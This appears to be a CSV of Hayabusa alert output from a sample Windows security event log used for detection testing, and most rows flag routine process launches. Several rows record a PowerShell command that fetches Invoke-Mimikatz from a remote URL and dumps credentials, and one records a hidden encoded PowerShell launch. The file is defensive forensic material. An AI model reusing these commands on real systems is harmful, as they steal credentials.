Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:45.022 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 
Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c 
""""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 